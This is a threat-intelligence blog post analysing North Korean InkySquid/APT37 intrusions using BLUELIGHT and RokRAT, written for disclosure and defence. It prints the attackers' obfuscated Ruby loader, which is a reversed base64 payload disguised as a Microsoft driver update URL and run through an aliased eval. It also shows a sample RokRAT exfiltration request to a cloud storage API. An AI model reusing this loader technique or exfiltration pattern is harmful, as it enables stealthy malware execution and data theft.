## BLOG # North Korean BLUELIGHT Special: InkySquid Deploys RokRAT ### AUGUST 24, 2021 by Damien Cash, Josh Grunzweig, Steven Adair, Thomas Lancaster    [In a recent blog post, Volexity disclosed details on a portion of the operations by a North Korean](https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/) threat actor it tracks as InkySquid. This threat actor compromised a news portal to use recently patched browser exploits to deliver a custom malware family known as BLUELIGHT. This follow-up post describes findings from a recent investigation undertaken by Volexity in which [the BLUELIGHT malware was discovered being delivered to a victim alongside RokRAT (aka](https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat) [DOGCALL). RokRAT is a backdoor previously attributed to use by ScarCruft/APT37, which is also](https://attack.mitre.org/software/S0213/) known as InkySquid. It should be noted that Volexity identified some overlap between the findings [discussed in this post and this Korean-language article.](https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48) ----- # Analysis Volexity is often asked to analyze systems of users frequently targeted by state-sponsored threat actors based on some tip-off or concern that the systems may be compromised. In this case, it was a system belonging to an individual who is a frequent target of North Korean threat actors. Prior to contacting Volexity, the user had run four separate, popular antivirus programs in #### attempts to identify and remove any malware. Despite these actions, the user was still concerned that their machine may have been infected. Despite less-than-ideal conditions for the starting analysis state, Volexity was able to identify two separate malware infections on the system, and a likely start date for the infection. However, it was not possible to confirm how it became infected, as it had been rebooted multiple times since initial infection and several weeks had passed. The first malware discovered was installed using a convoluted loading mechanism, where a full copy of Python 2.7 was installed into the following directory: ``` %USERPROFILE%/Python27(64) ``` An encoded blob was then stored in the following location: ``` %PROGRAMDATA%/hiddigi/msihnd ``` A loading script written in Python was written to the following directory: ``` %LocalAppData%/Microsoft/mdmadc/KBDBGPH1 ``` Following this, the attacker configured a Scheduled Task to use the Python binary to run the loading script and execute the encoded blob. The script decoded a shellcode stub at the head of the msihnd file, which is responsible for setting up a child process using the name of a randomly chosen EXE file from the "C:\Windows\System32" directory. The main malware was then decoded from data stored after the initial shellcode, using a single-byte XOR key of 0x74. The result of this process was that a version of the BLUELIGHT malware family would be loaded. While the sample [of BLUELIGHT analyzed in the previous post used Microsoft Graph for command and control, this](https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/) version used a custom Google Web App. ----- The loading mechanism for this family was similar to that used for BLUELIGHT; although this time, a copy of Ruby was installed at the following path: ``` %LOCALAPPDATA%/Microsoft/Ruby27-x64/ ``` The attacker dropped two encoded blobs to the following locations: ``` %PROGRAMDATA%/User-Mode Bus Enumerator/1BA76030/Shortcut_674D.info %PROGRAMDATA%/Local Kernel Debugger/18E911AC/WinSDK_4641.info ``` A loading script, written in Ruby, was saved to the following location and set to run as a Scheduled Task: ``` %PROGRAMDATA%/Microsoft Basic Display Driver/57D45646/Readme.io.md ``` The Ruby loading script was made to appear as though it were a real system file, with comments indicating it was part of the operating system. The malicious content is encoded within a URL string, as shown in the Ruby script below: ----- ``` # 14:21:58 27/02/2004 # Copyright (c) Microsoft Corporation. All rights reserved. require 'base64' require 'fiddle/import' # Update Driver: name=Microsoft Basic Display Driver, id=289A1260 url7d37 = 'https://update.microsoft.com/driverupdate? id=K0AM3YEMjoQD7kCMxoCM2oCMwATMgwCZhVmcoRHK0NWZqJ2Tlx2Zul2Uy9mR0lWYXpjO yMDbl5mcltkCNsTKwACLwACLwACLyRHcgwCMgwCMoQWYlJHaUVGdhVmcDpjOyMDbl5mcltE I9ACZhVmcoRnCNsTKlpXaz5CZwV3YzBCLmVnYgwic0BHK5J3btVWTlZ3bNxGdSpjOyMDbl5 mcltkCNQmblpQD7kXZrBiXg0VabZWdiBSPg0FdlNnZm9mcpZWLptlZ1JGIgoQDvRGIlpXaz 5CZwV3Yz5iL0V2cmZ2bylmZg4WagkGIy9mZK0wO2sSXwslZ1JGI9ACdlNnZm9mcpZmCNsTX dBzWmVnYrEzWmVnYg0DI5V2aK0QQCV0MjoQD70FZwV3YztlclRnbp9GU6oTZsRGZpZEI9Ai Z1JmCNsTKwACLwACLwADN4BDIrASZ6l2cuQGc1N2cgwic0BHK0NWZ09mcQxWY1RncpZlO6I zMsVmbyV2SK0wOpADN4BDIsADMwMDewACLwADN4BDIrASZ6l2cuQGc1N2cgwCMoM2bsxWQs FWd0JXaWpjOyMDbl5mcltEI9Aic0BnCNsTZz9Gbj5SZslmZjNnCNsDZhVmcuUGbpZ2YzBSP gQGc1N2cK0wOpIiYyJCLi8mZulmLERzN28Fd1NGdy9GaTxFXwMDM2cTQCFDXcJ3b0Fmcl1W duVEIzVnQgUGZv1ULyV2cVxFXhRXYE1WYyd2byBFXcpzQigiblB3buUGbpZEI9ASZslmZjN nCNsTKnQXa4VEIuECZuV3bGBCdv5EIlxWaGdCKzRXdwpQDk5WZK0QMCRENjACIK0wJpcmbv xGIkVmbnl2cuVHIsoCZp9mdoQ3YlpmYPVGbn5WaTJ3bGRXahdFI05WagQWZudWaz5WdnAib yVGd4VGIgoQDnkiKn52bsBCZl52ZpNnb1BCLn52bsBCZl52ZpNnb1BCLqQWavZHIsoCZp9m dgwCVfVkWJNFIsoCZp9mdoQWYlJHaUVGdhVmcDBiKkl2b2dCIuJXZ0hXZgAiCNcSKU9VRal 0UgwiKkl2b2BCLqQWavZHK5J3btVWTlZ3bNxGdSBCZp9mdnAibyVGd4VGIgoQDnkiKn52bs BCZl52ZpNnb1BCLn52bsBCZl52ZpNnb1BCLU9VRal0UgwiKkl2b2hCdjVGdvJHUsFWd0JXa WBCdul2Jg4mclRHelBCIK0wJpcmbvxGIkVmbnl2cuVHIscmbvxGIkVmbnl2cuVHIsQ1XFpV STBCLqQWavZHKj9GbsFEbhVHdylmVgoCZp9mdnAibyVGd4VGIgoQDncmbvxGIn52bsBCZl5 2ZpNnb1dCIscCVfVkWJN1JgMXYpxWYlBXe0BCIK0QOCNkMjACIK0wJyMDbl5mclt2JgQWYv xGbkBCIK0gclRncvBXbJpjOlxGZklmRgQmblRHelBCIK0gMzwWZuJXZLBSZsVHZv1mCNYDO 0AzI'; alias UrlFilter1462 eval; # UrlFilter: id=74F51EE8 UrlFilter1462(Base64.decode64(url7d37[45..-1].reverse)); ``` The effect of this script is to reverse the content after “id=” in the URL and base64 decode it, yielding the real script’s true intent: to decrypt the previously written Shortcut_674D.info file using a simple XOR operation. After the Shortcut_674D.info file is decrypted, it is executed within a new thread. This data acts as shellcode that seeks out and decrypts an embedded blob of data using a mix of ROL and XOR operations. After decryption, an executable file remains and is then run. ----- loader uses the hostname of the current system to decrypt the embedded payload. Therefore, if it is run on any system other than the one intended, the malware will fail to execute. This trait illustrates that the malware is customized; it was created specifically for the exact victim system on which it was discovered. [If decryption of the payload is successful, the final payload is an instance of the RokRAT malware](https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat) family with the following properties: SHA256 19ee7d139908a889d08508dd4225f2d27958ac2c8b7ff18a97507f7de8ce79bc SHA1 ff080176ab9e51ace68dbe3a56629168b41fa1fc MD5 9d2e5f9274b25740131f3b6139e3c3ce File Type Win64 EXE Compile Time 2021:05:25 02:20:44+01:00 Much like BLUELIGHT, this malware family uses cloud services for all communications, supporting **PCloud, Yandex, Dropbox, and Box for command and control. The API keys for this** communication are embedded within the malware itself. The malware is able to perform a number of functions, including but not limited to the following: Keylogging and extraction of clipboard data Collection of specific filetypes Download/execute further payloads Exfiltrated data is encrypted using an RSA public key, preventing third parties from decrypting it. An example exfiltration request is below: |SHA256|19ee7d139908a889d08508dd4225f2d27958ac2c8b7ff18a97507f7de8ce79bc| |---|---| |SHA1|ff080176ab9e51ace68dbe3a56629168b41fa1fc| |MD5|9d2e5f9274b25740131f3b6139e3c3ce| |File Type|Win64 EXE| |Compile Time|2021:05:25 02:20:44+01:00| ----- POST /uploadfile?path=/1&filename=202106221534400000.q00&nopartial=1 HTTP/1.1 Connection: close Content-Type: multipart/form-data;boundary=--wwjaughalvncjwiajs- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.8 Authorization: Bearer PpmL7Z9qHXPhLX38[TRUNCATED]kuk7HTet3AWYjwvAhuB User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Content-Length: 71795 Host: api.pcloud.com ----wwjaughalvncjwiajs- Content-Disposition: form-data; name="file"; filename="202106221534500000.q00" Content-Type: voice/mp3 [DATA] Much like its loader, this copy of RokRAT uses the victim’s hostname for decryption of important strings; it will fail to execute properly if the correct hostname is not present on the machine on which it is run. Additionally, strings within the malware referenced specific file paths that resided on the victim’s system. Presumably these paths were discovered by the attacker while running commands using BLUELIGHT, meaning the sample was compiled "live" following initial reconnaissance on the victim's system. # Conclusion RokRAT is a closed-source malware family believed to be used exclusively by the North Korean [APT37 threat actor, which Volexity tracks as InkySquid. The threat actor has attracted little public](https://malpedia.caad.fkie.fraunhofer.de/actor/apt37) attention in the last year and a half. In this case, Volexity was able to tie the new BLUELIGHT [malware family observed in the incident described in the previous post to APT37 based on the use](https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/) of RokRAT malware, since they were observed being deployed sequentially during the intrusion. Both the BLUELIGHT malware family and RokRAT use cloud services for command and control, making network-based detection more difficult. Additionally, while the installation of full copies of scripting languages such as Ruby and Python is noisy, they are cleverly used to obfuscate the actual malware which remains encoded on disk and is only truly visible in memory. ----- Volexity’s investigation. None detected the presence of either the RokRAT or BLUELIGHT malware families, showing the effectiveness of these techniques to load these malware families to evade detection. To prevent similar attacks from being effective against your organization, Volexity recommends the following: If enterprise users do not require access to cloud storage resources, consider blocking them as they are difficult to detect from a command-and-control perspective. Consider monitoring for and alerting on new scheduled tasks containing unusual arguments, particularly scripting language-based scheduled tasks. To prevent these specific attacks from being successful: [Use the YARA rules provided here to identify related malware.](https://github.com/volexity/threat-intel/blob/main/2021/2021-08-24%20-%20InkySquid%20Part%202/indicators/yara.yar) Block the Google App domain “636478154616 bt8kmnrg1l6oml3ipv7ifc6bck0in18h.apps.googleusercontent.com”. ### APT, APT37, BLUELIGHT, DPRK, InkySquid, North Korea, RokRAT -----